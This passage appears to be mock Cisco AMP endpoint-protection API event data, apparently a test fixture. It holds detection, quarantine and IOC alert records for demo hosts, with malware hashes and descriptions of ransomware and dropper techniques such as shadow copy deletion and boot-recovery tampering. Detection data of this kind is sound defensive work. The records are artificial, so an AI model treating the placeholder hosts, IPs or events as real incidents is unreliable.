activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837","sha1":"128aa78059540cf0cdae2a3cea30cd80e00f2046","md5":"c877b67a5733c59d0d8ed8d519df0c91"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533243623469744000,"timestamp":1610619329,"timestamp_nanoseconds":596000000,"date":"2021-01-14T10:15:29+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT657.tmp","file_path":"\\\\?\\C:\\BIT657.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241347137077000,"timestamp":1610618799,"timestamp_nanoseconds":657000000,"date":"2021-01-14T10:06:39+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241347137077251","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"SqGGuYXyy.exe","file_path":"\\\\?\\C:\\SqGGuYXyy.exe","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850","sha1":"cf162622e29bca072d01b274fbbc3ceaacdd13c7","md5":"0fe5be3811a98ee6a9c997d3812d911a"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 